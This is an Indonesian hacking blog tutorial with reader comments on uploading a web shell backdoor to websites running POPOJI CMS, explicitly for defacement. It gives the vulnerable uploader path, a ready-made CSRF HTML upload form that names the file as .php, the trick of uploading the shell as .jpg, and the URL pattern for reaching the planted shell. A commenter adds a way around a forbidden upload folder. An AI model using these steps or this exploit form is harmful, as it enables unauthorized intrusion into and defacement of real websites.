Home CMS Popoji Deface Dunia Komputer Hacking Keamanan Website Security Tester Tutorial Cara Upload Shell di CMS Popoji

Sunday 31 July 2016

Cara Upload Shell di CMS Popoji

Hello World ; Malam Fans, Please Say Hello Haters ;*
Kali ini Guee bakal Share Tutorial Cara Upload Shell di CMS Popoji , uihh :v akhirnye dah bisa upload shell wkwk <(")
ya riset upload shell ini gua dapet dari indoXploit *uihh galak inii para sesepuh, ngerisetnye ampe jozz >3<"
Sebelumnye Baca ini dulu: Deface Website berbasis CMS Popoji Lewat Register Account
okeii kita akan bahas disini, bagaimana meng-upload sebuah backdoor di POPOJI CMS

Pertama Lu harus sudah mendapatkan akses Login sebagai admin di web target !!
kalo sudah punya akun admin yang sudah terverif/aktif silahkan Lu login , sampai muncul ke page Dashbor admin


kalo dah Login, langsung buka URL bug/vuln di: 
target.c0li/po-admin/js/plugins/uploader/upload.php

Ciri2 Vuln o.O ?
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}
nb: wajib Login ke halaman dashbor dlu yee, kalo mau liat ini letak bugnyee
CSRF Code:

 <form method="post" action="target.c0li/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="name" value="nama_shell_anda.php">
<input type="submit" value="exploit">
</form>

* save dgn ekstensi .html
* lalu bukak dengan browser kalean.

 upload Shell lu. ingat shell kalian disini yang kalian upload harus berEkstensi .jpg (note: shellLu.jpg) , bukanlah .php, .phtml ataupun jenis bypass ekstensi yang lainnyaa.
jika berhasil . hasil output nya akan sama kyk yang pertama. tidak ada tulisan error sama sekali.

 Terus cara tau Letak Shell nye Piye Om o.O ??


buka folder /po-upload/ , carane bukak url: target.c0li/po-content/po-upload/ , liat list yang kek di SS, carii shell lu, kalo dah ketemu Klik ae ..
kaloo pas folder /po-upload/ nya di buka ternyata muncul notice Forbidden wkkw, silahkan muter otak anda utk mencari backdoor lu wkwk..


akses shell: 
target/po-content/po-upload/nama_shell_anda-[angka_random]-polibrary.php


Hahaha, gak afdol yee ngeXploit tanpa tau cara bangunnye, Silahkan Baca artikel yg dulu Nue post di Blog ini: Tutorial Instalasi CMS Popoji

 Sekian Artikel Cara MengUpload Backdoor pada CMS Popoji.
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Defacing gan ~
Sekian dan semoga bermanfaat .. terimakasih

Source and Thanks to: indoXploit

./Nuenomaru

Kami ada dan Berkarya, bukan utk disanjungi kok ^_^


Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Cara Upload Shell di CMS Popoji Cara Upload Shell di CMS Popoji Ketikan Nue 5.0 stars based on 35 reviews Hello World ; Malam Fans, Please Say Hello Haters ;* Kali ini Guee bakal Share Tutorial Cara Upload Shell di CMS Popoji , uihh :v akhirn...
Share this with short URL Get Short URLloading short url

Related Posts

Next Post
Previous Post

6 comments

avatar
Balas
MasterBlog TCA delete 21 September 2016 at 22:54

ikhlaskan mz :v, cari target laen hehehe

#Nuenomaru

avatar
Balas
Unknown delete 5 October 2016 at 19:22

Forbidden? buka
target.com/po-admin/admin.php?mod=post&act=addnew
baru di bawah klik Insert->Insert Image
dah, cari nama file lu...

avatar
Balas
MasterBlog TCA delete 6 October 2016 at 07:30

wadoh petrik, makin banyak trik2 yg kebuka >.<"
nice solusi mz :v

#Nuenomaru


EmoticonEmoticon

Subscribe to: Post Comments (Atom)